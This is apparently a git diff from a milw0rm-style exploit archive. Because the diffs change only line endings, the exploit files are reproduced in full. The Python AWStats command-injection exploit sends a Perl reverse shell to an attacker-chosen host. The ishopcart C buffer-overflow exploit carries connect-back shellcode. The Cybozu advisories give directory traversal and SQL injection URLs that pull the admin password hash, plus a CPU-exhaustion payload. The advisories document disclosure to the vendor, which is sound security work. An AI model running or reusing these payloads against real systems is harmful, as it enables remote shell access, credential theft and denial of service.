@@ -1,131 +1,131 @@ -#!/usr/bin/env python -# http://secunia.com/advisories/19969/ -# by redsand@blacksecurity.org -# May 5, 2006 - HAPPY CINCO DE MAYO -# HAPPY BIRTHDAY DAD -# private plz - - -# -# redsand@jinxy ~/ $ nc -l -p 31337 -v -# listening on [any] 31337 ... -# connect to [65.99.197.147] from blacksecurity.org [65.99.197.147] 53377 -# id -# uid=81(apache) gid=81(apache) groups=81(apache) -# - - -import sys, socket, base64 -import urllib2, urlparse, urllib - -# perl 1 line tcp connect-back code -# needs ip & port -cmd = 'perl -e \'$h="%s";$p=%r;use Socket;$sp=inet_aton($h);$sa=sockaddr_in($p,$sp);;socket(CLIENT,PF_INET,SOCK_STREAM,getprotobyname("tcp"));gethostbyname($h);connect(CLIENT,$sa);open(STDIN,">&CLIENT");open(STDOUT,">&CLIENT");open(STDERR,">&CLIENT");if(fork()){exec "/bin/sh"; exit(0); };\''; - -class rbawstatsMigrate: - __url = '' - __user = '' - __password = '' - __auth = False - __chost =False - __cport = False - - def __init__(self,host=False, ur=False, ps=False, chost=False, cport=False): - if host: - self.__url = host - if ur: - self.__user = ur - if ps: - self.__password = ps - - if ur or ps: self.__auth = True - - - if chost: self.__chost = chost - if cport: self.__cport = cport - - - url = urlparse.urlsplit(self.__url) - - i = url[1].find(';') - if i >= 0: - self.__parsed_host = url[1][:i] - else: - self.__parsed_host = url[1] - - def probe(self): - - cphost = socket.gethostbyname_ex(self.__chost) - - my_cmd = cmd % (cphost[2][0],self.__cport) - url_xpl = { "config": self.__parsed_host, - "migrate":"|cd /tmp/ && %s|awstats052005.%s.txt" % (my_cmd, self.__parsed_host) - # "migrate":"|cd /tmp/ && wget %s && chmod 777 %s && /tmp/%s|awstats052005.%s.txt" % (rsv, fname, fname, self.__parsed_host) - - } - - #if self.__url[len(self.__url) -1] != '?': - # url_xpl = '?' 
+ url_xpl - - url = self.__url - url_xpl = urllib.urlencode(url_xpl) - - try: - req = urllib2.Request(url, url_xpl) - if(self.__auth): - b64str = base64.encodestring('%s:%s' % (self.__user,self.__password))[:-1] - req.add_header('Authorization', "Basic %s"% b64str) - - req.add_header('Referer', "http://exploit.by.redsand.of.blacksecurity.org") - req.add_header('Accept', 'text/xml,application/xml,application/xhtml+xml,image/jpeg,image/gif;q=0.2,text/css,*/*;q=0.1') - req.add_header('Accept-Language','en-us') - req.add_header('Accept-Encoding','deflate, gzip') - req.add_header('User-Agent', "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; [BL4CK] Security") - req.add_header('Connection' ,'Keep-Alive') - req.add_header('Cache-Control','no-cache') - q = urllib2.urlopen(req) - except IOError, e: - print "FAILED %s" % e - sys.exit(0) - - print "SUCCESS, now check to see if it connected-back properly to %s:%s" % (self.__chost,self.__cport) - sys.exit(0) - - - - -user=False -pas=False -url=False -chst=False -cprt=False - -print "[BL4CK] AWStats CMD Injection Exploit by redsand@blacksecurity.org" -print "http://secunia.com/advisories/19969/" -print "http://blacksecurity.org - f0r my h0mi3s" - -argc = len(sys.argv) -if(argc <= 3): - print "USAGE: %s http://host/awstats.pl [username] [password] " % sys.argv[0] - print "\t\* Support 401 HTTP Authentication" - sys.exit(0) -if(argc > 1): - url = sys.argv[1] -if(argc > 2): - chst = sys.argv[2] -if(argc > 3): - cprt = sys.argv[3] -if(argc > 4): - user = sys.argv[4] -if(argc > 5): - pas = sys.argv[5] - - - - - -red = rbawstatsMigrate(url, user, pas, chst, cprt) - -red.probe() - -# milw0rm.com [2006-05-06] +#!/usr/bin/env python +# http://secunia.com/advisories/19969/ +# by redsand@blacksecurity.org +# May 5, 2006 - HAPPY CINCO DE MAYO +# HAPPY BIRTHDAY DAD +# private plz + + +# +# redsand@jinxy ~/ $ nc -l -p 31337 -v +# listening on [any] 31337 ... 
+# connect to [65.99.197.147] from blacksecurity.org [65.99.197.147] 53377 +# id +# uid=81(apache) gid=81(apache) groups=81(apache) +# + + +import sys, socket, base64 +import urllib2, urlparse, urllib + +# perl 1 line tcp connect-back code +# needs ip & port +cmd = 'perl -e \'$h="%s";$p=%r;use Socket;$sp=inet_aton($h);$sa=sockaddr_in($p,$sp);;socket(CLIENT,PF_INET,SOCK_STREAM,getprotobyname("tcp"));gethostbyname($h);connect(CLIENT,$sa);open(STDIN,">&CLIENT");open(STDOUT,">&CLIENT");open(STDERR,">&CLIENT");if(fork()){exec "/bin/sh"; exit(0); };\''; + +class rbawstatsMigrate: + __url = '' + __user = '' + __password = '' + __auth = False + __chost =False + __cport = False + + def __init__(self,host=False, ur=False, ps=False, chost=False, cport=False): + if host: + self.__url = host + if ur: + self.__user = ur + if ps: + self.__password = ps + + if ur or ps: self.__auth = True + + + if chost: self.__chost = chost + if cport: self.__cport = cport + + + url = urlparse.urlsplit(self.__url) + + i = url[1].find(';') + if i >= 0: + self.__parsed_host = url[1][:i] + else: + self.__parsed_host = url[1] + + def probe(self): + + cphost = socket.gethostbyname_ex(self.__chost) + + my_cmd = cmd % (cphost[2][0],self.__cport) + url_xpl = { "config": self.__parsed_host, + "migrate":"|cd /tmp/ && %s|awstats052005.%s.txt" % (my_cmd, self.__parsed_host) + # "migrate":"|cd /tmp/ && wget %s && chmod 777 %s && /tmp/%s|awstats052005.%s.txt" % (rsv, fname, fname, self.__parsed_host) + + } + + #if self.__url[len(self.__url) -1] != '?': + # url_xpl = '?' 
+ url_xpl + + url = self.__url + url_xpl = urllib.urlencode(url_xpl) + + try: + req = urllib2.Request(url, url_xpl) + if(self.__auth): + b64str = base64.encodestring('%s:%s' % (self.__user,self.__password))[:-1] + req.add_header('Authorization', "Basic %s"% b64str) + + req.add_header('Referer', "http://exploit.by.redsand.of.blacksecurity.org") + req.add_header('Accept', 'text/xml,application/xml,application/xhtml+xml,image/jpeg,image/gif;q=0.2,text/css,*/*;q=0.1') + req.add_header('Accept-Language','en-us') + req.add_header('Accept-Encoding','deflate, gzip') + req.add_header('User-Agent', "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; [BL4CK] Security") + req.add_header('Connection' ,'Keep-Alive') + req.add_header('Cache-Control','no-cache') + q = urllib2.urlopen(req) + except IOError, e: + print "FAILED %s" % e + sys.exit(0) + + print "SUCCESS, now check to see if it connected-back properly to %s:%s" % (self.__chost,self.__cport) + sys.exit(0) + + + + +user=False +pas=False +url=False +chst=False +cprt=False + +print "[BL4CK] AWStats CMD Injection Exploit by redsand@blacksecurity.org" +print "http://secunia.com/advisories/19969/" +print "http://blacksecurity.org - f0r my h0mi3s" + +argc = len(sys.argv) +if(argc <= 3): + print "USAGE: %s http://host/awstats.pl [username] [password] " % sys.argv[0] + print "\t\* Support 401 HTTP Authentication" + sys.exit(0) +if(argc > 1): + url = sys.argv[1] +if(argc > 2): + chst = sys.argv[2] +if(argc > 3): + cprt = sys.argv[3] +if(argc > 4): + user = sys.argv[4] +if(argc > 5): + pas = sys.argv[5] + + + + + +red = rbawstatsMigrate(url, user, pas, chst, cprt) + +red.probe() + +# milw0rm.com [2006-05-06] diff --git a/platforms/cgi/webapps/179.c b/platforms/cgi/webapps/179.c index 8ee6dfd1e..73a736c76 100755 --- a/platforms/cgi/webapps/179.c +++ b/platforms/cgi/webapps/179.c 
@@ -356,6 +356,6 @@ int main(int argc, char **argv)
 news_update_exploit(argv[1], buf);
 return (0);
 }
-
-
-// milw0rm.com [2000-11-15]
+
+
+// milw0rm.com [2000-11-15]
diff --git a/platforms/cgi/webapps/1862.c b/platforms/cgi/webapps/1862.c
index fee4fb326..41e794289 100755
--- a/platforms/cgi/webapps/1862.c
+++ b/platforms/cgi/webapps/1862.c
@@ -1,173 +1,173 @@ -/* Creator: K-sPecial (xzziroz.net) of .aware (awarenetwork.org) - * Name: ishopcart-cgi-bof.c (<= easy-scart6.c) - * Date: 5/25/2006 - * Version: - * 1.00 (5/25/2006) - ishopcart-cgi-bof.c created - * - * Description: there is an overflow in the vGetPost() function, it does not do any size checking on the inputed data but instead - * reads until the word "Submit" is encountered, in turn overflowing pszBuf which points to a 4000 byte buffer in main(). Complete - * code execution is spawned, with the code being a connectback shell. - * - * Notes: I could not for the life of me find any connect back shellcode that forks! This code needed to fork because apache - * was killing the connect back process as soon as it connected. So, in turn, I have modified netric's callback shellcode with - * some forking shellcode to accomplish the workaround. - * - * Compile: gcc -o icb ishopcart-cgi-bof.c -std=c99 -*/ -#include -#include -#include -#include -#include -#include -#include -#include -#include - -#define PORT 80 -#define CB_PORT 31337 -#define IP_OFFSET 33 + 13 -#define PORT_OFFSET 39 + 13 // + 13 to these for the new forking mod added to cb[] -#define OFFSET 0x41414141 // find your own damn offset, the code works 100% any fault is on yourself - -void changeip(char *ip); -void changeport(char *code, int port, int offset); -void help(void); - -// netric callback shellcode -char cb[] = - "\x31\xc0\x31\xdb" - - "\xb0\x02" // movb $0x2,%al / sys_fork (2) - "\xcd\x80" // int $0x80 - "\x38\xc3" // cmpl %ebx,%eax / check if child; %eax = 0x0 - "\x74\x05" // je 0x5 / jump after the exit if we're the child - // sys_exit (1) - "\x8d\x43\x01" // leal 0x1(%ebx),%eax / sys_exit (1) if we're the parent - "\xcd\x80" // int $0x80 / interrupt 80 to execute sys_exit - - "\x31\xc9\x51\xb1" - "\x06\x51\xb1\x01\x51\xb1\x02\x51" - "\x89\xe1\xb3\x01\xb0\x66\xcd\x80" - "\x89\xc2\x31\xc0\x31\xc9\x51\x51" - "\x68\x41\x42\x43\x44\x66\x68\xb0" - 
"\xef\xb1\x02\x66\x51\x89\xe7\xb3" - "\x10\x53\x57\x52\x89\xe1\xb3\x03" - "\xb0\x66\xcd\x80\x31\xc9\x39\xc1" - "\x74\x06\x31\xc0\xb0\x01\xcd\x80" - "\x31\xc0\xb0\x3f\x89\xd3\xcd\x80" - "\x31\xc0\xb0\x3f\x89\xd3\xb1\x01" - "\xcd\x80\x31\xc0\xb0\x3f\x89\xd3" - "\xb1\x02\xcd\x80\x31\xc0\x31\xd2" - "\x50\x68\x6e\x2f\x73\x68\x68\x2f" - "\x2f\x62\x69\x89\xe3\x50\x53\x89" - "\xe1\xb0\x0b\xcd\x80\x31\xc0\xb0" - "\x01\xcd\x80"; - -int main (int argc, char **argv) { - int sock; - unsigned offset = OFFSET, ipaddr, i = 0; - unsigned short port = PORT, cbport = CB_PORT; - struct sockaddr_in server; - char *host, *location, *cbip, buff[5120], opt; - - host = location = cbip = 0; - - while ((opt = getopt(argc, argv, "i:p:o:l:1:2:h")) != -1) { - switch(opt) { - case 'i': - host = optarg; - break; - case 'p': - sscanf(optarg, "%hu", &port); - break; - case 'o': - sscanf(optarg, "%x", &offset); - break; - case 'l': - location = optarg; - break; - case '1': - cbip = optarg; - break; - case '2': - sscanf(optarg, "%hu", &cbport); - break; - } - } - - if (!(host && location && cbip)) { - puts("-!> a required argument was missing\n"); - help(); - exit(1); - } - - changeip(cbip); - changeport(cb, cbport, PORT_OFFSET); - - if ((sock = socket(PF_INET, SOCK_STREAM, 0)) == -1) { - printf("socket() error: %s\n", strerror(errno)); - exit(1); - } - server.sin_port = htons(port); - - if ((ipaddr = inet_addr(host)) == -1) { - struct hostent *myhost; - if ((myhost = gethostbyname(host)) == 0) { - printf("-!> failed to resolve host '%s'\n", host); - exit(1); - } - memcpy((char*) &server.sin_addr, myhost->h_addr, myhost->h_length); - } - else server.sin_addr.s_addr = ipaddr; - - server.sin_family = AF_INET; - memset(&(server.sin_zero), 0, 8); - - if (connect(sock, (struct sockaddr *) &server, sizeof(server)) != 0) { - printf("-!> connect() to '%s:%hu' failed: %s\n", host, port, strerror(errno)); - exit(1); - } - sprintf(buff, "GET %s?sslinvoice HTTP/1.1\nHost: %s\nContent-Length: %u\n\n", location, 
host, 4000 + sizeof(cb) + 512 - 1 + strlen("Submit")); - send(sock, buff, strlen(buff), 0); - - for (0; i < 4000; i++) *(buff+i) = 0x90; - for (unsigned a = 0; a < sizeof(cb) - 1; i++, a++) *(buff+i) = *(cb+a); - for (unsigned a = 0; a < 128; i += 4, a++) memcpy(buff+i, &offset, 4); - - strcpy(buff+4000+sizeof(cb)+512 - 1, "Submit\n"); - - - send(sock, buff, 4000 + sizeof(cb) + 512 - 1 + strlen("Submit"), 0); -} - -void help (void) { - char *string = "ishopcart CGI shopcart buffer overflow exploit by K-sPecial (http://xzziroz.net) of .aware (http://awarenetwork.org)\nLicense: GPL (5/24/2006)\n\n" - "-i <%s> \t - specifies the vulnerable host; default 80\n" - "-p [%hu] \t - specifies the vulnerable host's port\n" - "-l <%s> \t - specifies the vulnerable CGI location\n" - "-o [%x] \t - forces an explicit offset\n" - "-1 <%s> \t - specifies the connect back ip\n" - "-2 [%hu] \t - specifies the connect back port; default 31337\n" - "-h \t - shows this help\n"; - - puts(string); -} - -void changeip(char *ip) { - char *ptr; - ptr=cb+IP_OFFSET; - /* Assume Little-Endianess.... */ - *((long *)ptr)=inet_addr(ip); -} - -// ripped from some of snooq's code -void changeport(char *code, int port, int offset) { - char *ptr; - ptr=code+offset; - /* Assume Little-Endianess.... */ - *ptr++=(char)((port>>8)&0xff); - *ptr++=(char)(port&0xff); -} - -// milw0rm.com [2006-06-02] +/* Creator: K-sPecial (xzziroz.net) of .aware (awarenetwork.org) + * Name: ishopcart-cgi-bof.c (<= easy-scart6.c) + * Date: 5/25/2006 + * Version: + * 1.00 (5/25/2006) - ishopcart-cgi-bof.c created + * + * Description: there is an overflow in the vGetPost() function, it does not do any size checking on the inputed data but instead + * reads until the word "Submit" is encountered, in turn overflowing pszBuf which points to a 4000 byte buffer in main(). Complete + * code execution is spawned, with the code being a connectback shell. 
+ * + * Notes: I could not for the life of me find any connect back shellcode that forks! This code needed to fork because apache + * was killing the connect back process as soon as it connected. So, in turn, I have modified netric's callback shellcode with + * some forking shellcode to accomplish the workaround. + * + * Compile: gcc -o icb ishopcart-cgi-bof.c -std=c99 +*/ +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#define PORT 80 +#define CB_PORT 31337 +#define IP_OFFSET 33 + 13 +#define PORT_OFFSET 39 + 13 // + 13 to these for the new forking mod added to cb[] +#define OFFSET 0x41414141 // find your own damn offset, the code works 100% any fault is on yourself + +void changeip(char *ip); +void changeport(char *code, int port, int offset); +void help(void); + +// netric callback shellcode +char cb[] = + "\x31\xc0\x31\xdb" + + "\xb0\x02" // movb $0x2,%al / sys_fork (2) + "\xcd\x80" // int $0x80 + "\x38\xc3" // cmpl %ebx,%eax / check if child; %eax = 0x0 + "\x74\x05" // je 0x5 / jump after the exit if we're the child + // sys_exit (1) + "\x8d\x43\x01" // leal 0x1(%ebx),%eax / sys_exit (1) if we're the parent + "\xcd\x80" // int $0x80 / interrupt 80 to execute sys_exit + + "\x31\xc9\x51\xb1" + "\x06\x51\xb1\x01\x51\xb1\x02\x51" + "\x89\xe1\xb3\x01\xb0\x66\xcd\x80" + "\x89\xc2\x31\xc0\x31\xc9\x51\x51" + "\x68\x41\x42\x43\x44\x66\x68\xb0" + "\xef\xb1\x02\x66\x51\x89\xe7\xb3" + "\x10\x53\x57\x52\x89\xe1\xb3\x03" + "\xb0\x66\xcd\x80\x31\xc9\x39\xc1" + "\x74\x06\x31\xc0\xb0\x01\xcd\x80" + "\x31\xc0\xb0\x3f\x89\xd3\xcd\x80" + "\x31\xc0\xb0\x3f\x89\xd3\xb1\x01" + "\xcd\x80\x31\xc0\xb0\x3f\x89\xd3" + "\xb1\x02\xcd\x80\x31\xc0\x31\xd2" + "\x50\x68\x6e\x2f\x73\x68\x68\x2f" + "\x2f\x62\x69\x89\xe3\x50\x53\x89" + "\xe1\xb0\x0b\xcd\x80\x31\xc0\xb0" + "\x01\xcd\x80"; + +int main (int argc, char **argv) { + int sock; + unsigned offset = OFFSET, ipaddr, i = 0; + unsigned short port = PORT, cbport = CB_PORT; + struct sockaddr_in 
server; + char *host, *location, *cbip, buff[5120], opt; + + host = location = cbip = 0; + + while ((opt = getopt(argc, argv, "i:p:o:l:1:2:h")) != -1) { + switch(opt) { + case 'i': + host = optarg; + break; + case 'p': + sscanf(optarg, "%hu", &port); + break; + case 'o': + sscanf(optarg, "%x", &offset); + break; + case 'l': + location = optarg; + break; + case '1': + cbip = optarg; + break; + case '2': + sscanf(optarg, "%hu", &cbport); + break; + } + } + + if (!(host && location && cbip)) { + puts("-!> a required argument was missing\n"); + help(); + exit(1); + } + + changeip(cbip); + changeport(cb, cbport, PORT_OFFSET); + + if ((sock = socket(PF_INET, SOCK_STREAM, 0)) == -1) { + printf("socket() error: %s\n", strerror(errno)); + exit(1); + } + server.sin_port = htons(port); + + if ((ipaddr = inet_addr(host)) == -1) { + struct hostent *myhost; + if ((myhost = gethostbyname(host)) == 0) { + printf("-!> failed to resolve host '%s'\n", host); + exit(1); + } + memcpy((char*) &server.sin_addr, myhost->h_addr, myhost->h_length); + } + else server.sin_addr.s_addr = ipaddr; + + server.sin_family = AF_INET; + memset(&(server.sin_zero), 0, 8); + + if (connect(sock, (struct sockaddr *) &server, sizeof(server)) != 0) { + printf("-!> connect() to '%s:%hu' failed: %s\n", host, port, strerror(errno)); + exit(1); + } + sprintf(buff, "GET %s?sslinvoice HTTP/1.1\nHost: %s\nContent-Length: %u\n\n", location, host, 4000 + sizeof(cb) + 512 - 1 + strlen("Submit")); + send(sock, buff, strlen(buff), 0); + + for (0; i < 4000; i++) *(buff+i) = 0x90; + for (unsigned a = 0; a < sizeof(cb) - 1; i++, a++) *(buff+i) = *(cb+a); + for (unsigned a = 0; a < 128; i += 4, a++) memcpy(buff+i, &offset, 4); + + strcpy(buff+4000+sizeof(cb)+512 - 1, "Submit\n"); + + + send(sock, buff, 4000 + sizeof(cb) + 512 - 1 + strlen("Submit"), 0); +} + +void help (void) { + char *string = "ishopcart CGI shopcart buffer overflow exploit by K-sPecial (http://xzziroz.net) of .aware (http://awarenetwork.org)\nLicense: GPL 
(5/24/2006)\n\n"
+ "-i <%s> \t - specifies the vulnerable host; default 80\n"
+ "-p [%hu] \t - specifies the vulnerable host's port\n"
+ "-l <%s> \t - specifies the vulnerable CGI location\n"
+ "-o [%x] \t - forces an explicit offset\n"
+ "-1 <%s> \t - specifies the connect back ip\n"
+ "-2 [%hu] \t - specifies the connect back port; default 31337\n"
+ "-h \t - shows this help\n";
+
+ puts(string);
+}
+
+void changeip(char *ip) {
+ char *ptr;
+ ptr=cb+IP_OFFSET;
+ /* Assume Little-Endianess.... */
+ *((long *)ptr)=inet_addr(ip);
+}
+
+// ripped from some of snooq's code
+void changeport(char *code, int port, int offset) {
+ char *ptr;
+ ptr=code+offset;
+ /* Assume Little-Endianess.... */
+ *ptr++=(char)((port>>8)&0xff);
+ *ptr++=(char)(port&0xff);
+}
+
+// milw0rm.com [2006-06-02]
diff --git a/platforms/cgi/webapps/188.pl b/platforms/cgi/webapps/188.pl
index 7a35e85a9..7e6198c0d 100755
--- a/platforms/cgi/webapps/188.pl
+++ b/platforms/cgi/webapps/188.pl
@@ -90,6 +90,6 @@ sub connect_host {
 socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
 connect(SOCKET, $paddr) || die("Error: $!\n");
 }
-
-
-# milw0rm.com [2000-11-17]
+
+
+# milw0rm.com [2000-11-17]
diff --git a/platforms/cgi/webapps/211.c b/platforms/cgi/webapps/211.c
index cd0aba50b..6e46ca7e7 100755
--- a/platforms/cgi/webapps/211.c
+++ b/platforms/cgi/webapps/211.c
@@ -165,6 +165,6 @@ int main(int argc, char **argv)
 }
 exit(0);
 }
-
-
-// milw0rm.com [2000-12-01]
+
+
+// milw0rm.com [2000-12-01]
diff --git a/platforms/cgi/webapps/2266.txt b/platforms/cgi/webapps/2266.txt
index cb46f70da..22ce7b988 100755
--- a/platforms/cgi/webapps/2266.txt
+++ b/platforms/cgi/webapps/2266.txt
@@ -1,70 +1,70 @@ -Cybozu Products Arbitrary File Retrieval Vulnerability - -by Tan Chew Keong -Release Date: 2006-08-28 - -Summary - -A vulnerability has been found in Cybozu Products. When exploited, the vulnerability allows -an authenticated user to retrieve arbitrary files accessible to the web server process. - -Tested Versions - * Cybuzu Office Version 6.5 (Build 1.2 20050427121735) for Windows - * Cybozu Share 360 Version 2.5 (Build 0.2 20050121115231) for Windows - - -Details - -This advisory discloses a directory traversal vulnerability in Cybozu products. -1) Cybozu Office File Cabinet File Download Directory Traversal - -Cybuzu Office does not properly validate the "id" parameter in "/scripts/cbag/ag.exe" before -using it to retrieve files from the file cabinet for a logon user. This allows a malicious user -to retrieve arbitrary files accessible to the web server process using directory traversal characters. - -Example (to retrieve the password hash of the admin page): - -http://192.168.1.64/scripts/cbag/ag.exe?page=FileDownload&id=../../../../../../../../../../../../../inetpub/scripts/cbag/cb5/data/admin¬imecard=1&type=text&subtype=html&ct=1 - - -2) Cybozu Share 360 File Cabinet and Message Attachment Download Directory Traversal - -Cybuzu Share 360 does not properly validate the "id" parameter in "/scripts/s360v2/s360.exe" -before using it to retrieve files from the file cabinet and to retrieve file attachments from a -received message/memo. This allows a malicious user to retrieve arbitrary files accessible to the -web server process using directory traversal characters. 
- -Example (to retrieve the password hash of the admin page): - -http://192.168.1.64/scripts/s360v2/s360.exe?page=FileDownload&id=../../../../../../../../../../inetpub/scripts/s360v2/s360v2/data/admin&type=text&subtype=plain&ct=1&.txt - -http://192.168.1.64/scripts/s360v2/s360.exe?page=MessageDownload&mid=37&id=../../../../../../../../../../inetpub/scripts/s360v2/s360v2/data/admin&bc=1&type=text&subtype=plain&ct=1&.txt - - -Patch / Workaround - -Cybuzu Office: -Update to Version 6.6 (Build 1.3). - -Cybozu Share 360: -Update to Version 2.5 (Build 0.3). - -References - -http://cybozu.co.jp/products/dl/notice_060825/ - -Disclosure Timeline - -2006-07-04 - Vulnerability Discovered. -2006-07-13 - Initial Vendor Notification. -2006-07-13 - Initial Vendor Reply. -2006-07-14 - Received scheduled patch release date from vendor. -2006-08-16 - Received notification that patch release will be delayed. -2006-08-25 - Vendor released patch information on website. -2006-08-28 - Public Disclosure. - -Contact -For further enquries, comments, suggestions or bug reports, simply email them to -Tan Chew Keong (chewkeong[at]vuln[dot]sg) - -# milw0rm.com [2006-08-28] +Cybozu Products Arbitrary File Retrieval Vulnerability + +by Tan Chew Keong +Release Date: 2006-08-28 + +Summary + +A vulnerability has been found in Cybozu Products. When exploited, the vulnerability allows +an authenticated user to retrieve arbitrary files accessible to the web server process. + +Tested Versions + * Cybuzu Office Version 6.5 (Build 1.2 20050427121735) for Windows + * Cybozu Share 360 Version 2.5 (Build 0.2 20050121115231) for Windows + + +Details + +This advisory discloses a directory traversal vulnerability in Cybozu products. +1) Cybozu Office File Cabinet File Download Directory Traversal + +Cybuzu Office does not properly validate the "id" parameter in "/scripts/cbag/ag.exe" before +using it to retrieve files from the file cabinet for a logon user. 
This allows a malicious user +to retrieve arbitrary files accessible to the web server process using directory traversal characters. + +Example (to retrieve the password hash of the admin page): + +http://192.168.1.64/scripts/cbag/ag.exe?page=FileDownload&id=../../../../../../../../../../../../../inetpub/scripts/cbag/cb5/data/admin¬imecard=1&type=text&subtype=html&ct=1 + + +2) Cybozu Share 360 File Cabinet and Message Attachment Download Directory Traversal + +Cybuzu Share 360 does not properly validate the "id" parameter in "/scripts/s360v2/s360.exe" +before using it to retrieve files from the file cabinet and to retrieve file attachments from a +received message/memo. This allows a malicious user to retrieve arbitrary files accessible to the +web server process using directory traversal characters. + +Example (to retrieve the password hash of the admin page): + +http://192.168.1.64/scripts/s360v2/s360.exe?page=FileDownload&id=../../../../../../../../../../inetpub/scripts/s360v2/s360v2/data/admin&type=text&subtype=plain&ct=1&.txt + +http://192.168.1.64/scripts/s360v2/s360.exe?page=MessageDownload&mid=37&id=../../../../../../../../../../inetpub/scripts/s360v2/s360v2/data/admin&bc=1&type=text&subtype=plain&ct=1&.txt + + +Patch / Workaround + +Cybuzu Office: +Update to Version 6.6 (Build 1.3). + +Cybozu Share 360: +Update to Version 2.5 (Build 0.3). + +References + +http://cybozu.co.jp/products/dl/notice_060825/ + +Disclosure Timeline + +2006-07-04 - Vulnerability Discovered. +2006-07-13 - Initial Vendor Notification. +2006-07-13 - Initial Vendor Reply. +2006-07-14 - Received scheduled patch release date from vendor. +2006-08-16 - Received notification that patch release will be delayed. +2006-08-25 - Vendor released patch information on website. +2006-08-28 - Public Disclosure. + +Contact +For further enquries, comments, suggestions or bug reports, simply email them to +Tan Chew Keong (chewkeong[at]vuln[dot]sg) + +# milw0rm.com [2006-08-28] 
diff --git a/platforms/cgi/webapps/2267.txt b/platforms/cgi/webapps/2267.txt index 55e9d209a..9ecbadd89 100755 --- a/platforms/cgi/webapps/2267.txt +++ b/platforms/cgi/webapps/2267.txt 
@@ -1,114 +1,114 @@ -Cybozu Garoon 2 SQL Injection Vulnerabilities - -by Tan Chew Keong -Release Date: 2006-08-28 - -Summary - -Some SQL injection vulnerabilities have been found in Cybozu Garoon 2. When exploited by a logon user, -the vulnerabilities allow manipulation of SQL statements which can lead to disclosure of information -from the database, or to cause the backend MySQL database to consume large amount of CPU resources. - -Tested Versions - -Cybuzu Garoon 2 Version 2.1.0 for Windows - -Details - -This advisory discloses several SQL injection vulnerabilities in Cybozu Garoon 2. -1) TODO List View/Modify SQL Injection Cybuzu Garoon 2 does not properly sanitise the "tid" parameter -in the TODO List View and Modify functionality. It is possible for a logon user to exploit this vulnerability -to select values from arbitrary tables in the database. - -When logon as a normal user: -TESTING NOTE a - In order for the examples to work, you must first logon as a user, then click on the TODO List link (icon) to go to the TODO List index page, before using the exploit. -TESTING NOTE b - Example 2 requires that at least 1 TODO List category has been created (category value 1). - - -Example 1: - -To retrieve the admin user's password hash via TODO List View. - -http://192.168.1.64/scripts/cbgrn/grn.exe/todo/view?tid=9999999)+union+select+1,null,col_foreign_key,col_password,2,null,0,null,null,null,null+from+tab_cb_user+where+_id=1/*&cid= - -Example 2: - -To retrieve the admin user's password hash via TODO List Modify. - -http://192.168.1.64/scripts/cbgrn/grn.exe/todo/modify?tid=9999999)+union+select+1,null,col_foreign_key,col_password,1,null,0,null,null,null,null+from+tab_cb_user+where+_id=1/*&cid= - - -2) Workflow View/Print SQL Injection - -Cybuzu Garoon 2 does not properly sanitise the "pid" parameter in the Workflow View and Print functionality. -It is possible for a logon user to exploit this vulnerability to select values from arbitrary tables in the database. 
- -Example 1: - -To retrieve the admin user's password hash via Workflow View. - -http://192.168.1.64/scripts/cbgrn/grn.exe/workflow/view?fid=9&pid=8888888+union+select+1,2,3,4,5,6,7,8,9,10,11,12,col_foreign_key,14,col_password,16,17,18,19,20,21,22+from+tab_cb_user where _id=1/* - -Example 2: - -To retrieve the admin user's password hash via Workflow Print. - -http://192.168.1.64/scripts/cbgrn/grn.exe/workflow/print?fid=9&pid=7777777+union+select+col_password,2,3,4,col_foreign_key,6,7,8,9,10,11,12,13,14,15,16,17,18+from+tab_cb_user where _id=1/* - -Note: In order for example 2 to work, "fid" must be a valid folder ID. - -3) Other SQL Injection Vulnerabilities - -Several other SQL injection vulnerabilities exists. These may e.g. be exploited to cause the MySQL-based Cybozu Database Engine to consume large amount of CPU resources, potentially causing a DoS. - -SQL Injection: - -http://192.168.1.64/scripts/cbgrn/grn.exe/todo/index?cid=[SQL] -http://192.168.1.64/scripts/cbgrn/grn.exe/todo/delete?tid=[SQL] -http://192.168.1.64/scripts/cbgrn/grn.exe/schedule/user_view?uid=1[SQL] -http://192.168.1.64/scripts/cbgrn/grn.exe/phonemessage/add?gid=1&uid=1[SQL] -http://192.168.1.64/scripts/cbgrn/grn.exe/phonemessage/history?gid=1&uid=1[SQL] -http://192.168.1.64/scripts/cbgrn/grn.exe/memo/view?iid=1[SQL]&did= -http://192.168.1.64/scripts/cbgrn/grn.exe/memo/print?iid=1[SQL]&did= -http://192.168.1.64/scripts/cbgrn/grn.exe/schedule/view?event=1[SQL] -http://192.168.1.64/scripts/cbgrn/grn.exe/schedule/view?event=1&uid=1[SQL] - -Test Samples: - -http://192.168.1.64/scripts/cbgrn/grn.exe/todo/index?cid=' -http://192.168.1.64/scripts/cbgrn/grn.exe/todo/delete?tid=' -http://192.168.1.64/scripts/cbgrn/grn.exe/schedule/user_view?uid=1' -http://192.168.1.64/scripts/cbgrn/grn.exe/phonemessage/add?gid=1&uid=1' -http://192.168.1.64/scripts/cbgrn/grn.exe/phonemessage/history?gid=1&uid=1' -http://192.168.1.64/scripts/cbgrn/grn.exe/memo/view?iid=1'&did= 
-http://192.168.1.64/scripts/cbgrn/grn.exe/memo/print?iid=1'&did= -http://192.168.1.64/scripts/cbgrn/grn.exe/schedule/view?event=1' -http://192.168.1.64/scripts/cbgrn/grn.exe/schedule/view?event=1&uid=1' - -Example Exploit Against MySQL Backend: - -http://192.168.1.64/scripts/cbgrn/grn.exe/todo/index?cid=9999999)+ORDER+BY+_id,rand(benchmark(1000000000000,sha1(123456781234567812345678)))/* - -Patch / Workaround - -Update to version 2.1.1. - -References - -http://cybozu.co.jp/products/dl/notice_060825/ - -Disclosure Timeline - -2006-07-04 - Vulnerability Discovered. -2006-07-13 - Initial Vendor Notification. -2006-07-13 - Initial Vendor Reply. -2006-07-14 - Received scheduled patch release date from vendor. -2006-08-16 - Received notification that patch release will be delayed. -2006-08-25 - Vendor released patch information on website. -2006-08-28 - Public Disclosure. - -Contact -For further enquries, comments, suggestions or bug reports, simply email them to -Tan Chew Keong (chewkeong[at]vuln[dot]sg) - -# milw0rm.com [2006-08-28] +Cybozu Garoon 2 SQL Injection Vulnerabilities + +by Tan Chew Keong +Release Date: 2006-08-28 + +Summary + +Some SQL injection vulnerabilities have been found in Cybozu Garoon 2. When exploited by a logon user, +the vulnerabilities allow manipulation of SQL statements which can lead to disclosure of information +from the database, or to cause the backend MySQL database to consume large amount of CPU resources. 